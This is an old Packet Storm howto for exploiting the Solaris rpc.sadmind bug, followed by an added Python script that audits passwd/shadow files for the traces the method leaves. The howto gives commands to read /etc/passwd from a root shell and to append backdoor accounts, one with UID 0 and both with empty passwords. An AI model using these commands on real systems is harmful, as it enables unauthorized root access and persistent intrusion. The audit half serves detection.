sadmind-howto.txt

22 Nov 2001 00:00:00, reported by Cyrax. Type: packetstorm. Source: packetstormsecurity.com

Exploit rpc.sadmind bug using brute forcer for rootshell access and user creation methods.

Code
```text
rpc.sadmind (27/02/2000)
------------------------

The bug in rpc.sadmind was reported a long time ago, but there has never
been a manual for it. So I decided to explain how to exploit the bug.
First of all I would recommend using the sadmind brute forcer for the
sploit files sadmindex-sparc.c and sadmindex-x86.c; you can find the
brute forcer at http://packetstormsecurity.org . Search for sadmind
brute forcer and the file sadmind-brute-lux.c will be the first file
you'll see...
You compile the brute forcer in the same directory as the sploit
files.
Run the brute forcer like this:
./sadmind-brute-force <arch> <host>
If you don't know what <arch> is then you do ./sadmind-brute-lux
You'll understand now =)
When you have found a vulnerable host (you can scan for RPC stuff with RPC
scanners LOL) you do this, for example:
./sadmind-brute-force 1 www.sadmindvulnhost.com

If you're dropped to a rootshell now, the host is vulnerable for real.
Otherwise, the host is patched.

Now that you're dropped to the rootshell you have 2 easy ways to exploit the
rpc.sadmind bug.
The first way, which is kinda lame, is that you view the /etc/passwd
(or the /etc/shadow of course) and then crack the password file with
a password cracker like John The Ripper --> this can take years!
You view the /etc/passwd like this:
cat /etc/passwd;
The ; must be added! If ya type cat /etc/passwd the server will recognize
this command as
cat /etc/passwd^m

The second way to exploit the bug is a lot faster than the first one.
Here we simply add two users, one with root privileges of course...
This example is for a host with /etc/shadow!
Type this at the rootshell:

echo cyrax:x:UID:GID:cyrax:/:/bin/sh >> /etc/passwd;
echo cyrax2:x:0:0:cyrax:/:/bin/sh >> /etc/passwd;
echo cyrax:::::: >> /etc/shadow;
echo cyrax2:::::: >> /etc/shadow;

Don't use > instead of >>: >> appends a line, > overwrites!
Replace UID and GID by 666 for example, but NOT by 0.
After you have typed this, two users will have been added to the server:
cyrax and cyrax2
You log in with the non-root user, cyrax, and then do su cyrax2
and set the password for the users...
Now you have root access to the server...

Written by : CyRaX ([email protected])
http://members.antionline.com/cyrax
Special thanks to : nostalg1c
greet[z] : kemX, Cheitan, guppy, |llus|0{\}
```
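The user-creation method above leaves very recognisable traces in /etc/passwd and /etc/shadow: a second UID 0 account, shadow entries whose password field is empty, and accounts with home directory / and an interactive shell. The following audit script is an added example (not part of the original howto or of any packetstorm tool); it parses passwd/shadow-style text and reports those patterns. The sample file contents, the field layout it checks and the severity labels are constructed for the example; on a real host you would feed it the contents of the actual files.

```python
"""Defensive check for the account-appending method described in the howto:
scan passwd/shadow contents for extra UID-0 accounts, empty shadow password
fields and the home-directory/shell pattern used there.
Added example, not part of the original text.  Sample data is constructed."""

from typing import Dict, List, Tuple

Finding = Tuple[str, str]  # (severity, message)

# Constructed sample contents: a small Solaris-style passwd/shadow pair with
# the two accounts from the howto appended (names and fields as in the text).
SAMPLE_PASSWD = """root:x:0:0:Super-User:/:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
nobody:x:60001:60001:Nobody:/:
cyrax:x:666:666:cyrax:/:/bin/sh
cyrax2:x:0:0:cyrax:/:/bin/sh
"""
SAMPLE_SHADOW = """root:ABCDEFGHIJKLM:6445::::::
daemon:NP:6445::::::
bin:NP:6445::::::
nobody:*LK*:6445::::::
cyrax::::::
cyrax2::::::
"""


def parse_colon_file(text: str) -> List[List[str]]:
    """Split a colon-separated account file into field lists, ignoring blank lines."""
    return [line.split(":") for line in text.splitlines() if line.strip()]


def audit_accounts(passwd_text: str, shadow_text: str,
                   expected_uid0: Tuple[str, ...] = ("root",)) -> List[Finding]:
    """Return (severity, message) findings for suspicious account entries."""
    findings: List[Finding] = []
    shadow: Dict[str, List[str]] = {}
    for fields in parse_colon_file(shadow_text):
        shadow[fields[0]] = fields

    seen_users = set()
    for fields in parse_colon_file(passwd_text):
        if len(fields) != 7:
            findings.append(("high", f"malformed passwd line: {':'.join(fields)!r}"))
            continue
        user, pw, uid, _gid, _gecos, home, shell = fields
        seen_users.add(user)

        # Any second UID-0 account is a root-equivalent login (the howto's cyrax2).
        if uid == "0" and user not in expected_uid0:
            findings.append(("critical", f"{user}: unexpected UID 0 account"))

        # Home "/" plus an interactive shell on a non-root account is the
        # pattern the appended lines use; flag it for review.
        if home == "/" and shell and user not in expected_uid0:
            findings.append(("medium", f"{user}: home directory / with login shell {shell}"))

        if pw == "x" and user not in shadow:
            findings.append(("high", f"{user}: passwd points to shadow but no shadow entry"))
        elif user in shadow:
            # An empty second field in shadow means the account has no password at all.
            if len(shadow[user]) < 2 or shadow[user][1] == "":
                findings.append(("critical", f"{user}: empty password field in shadow"))

    # Shadow entries with no passwd counterpart are also worth a look.
    for user in shadow:
        if user not in seen_users:
            findings.append(("medium", f"{user}: shadow entry without passwd entry"))
    return findings


def audit_sample() -> List[Finding]:
    """Run the audit over the constructed sample files."""
    return audit_accounts(SAMPLE_PASSWD, SAMPLE_SHADOW)


if __name__ == "__main__":
    for severity, message in audit_sample():
        print(f"[{severity}] {message}")
```

On the constructed sample the script reports the two appended accounts and nothing else: cyrax2 for its UID 0, both for their empty shadow password field, and both for the home-directory/shell pattern. The same three checks are what a host-integrity baseline (or a periodic diff of the two files against a known-good copy) should alert on.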
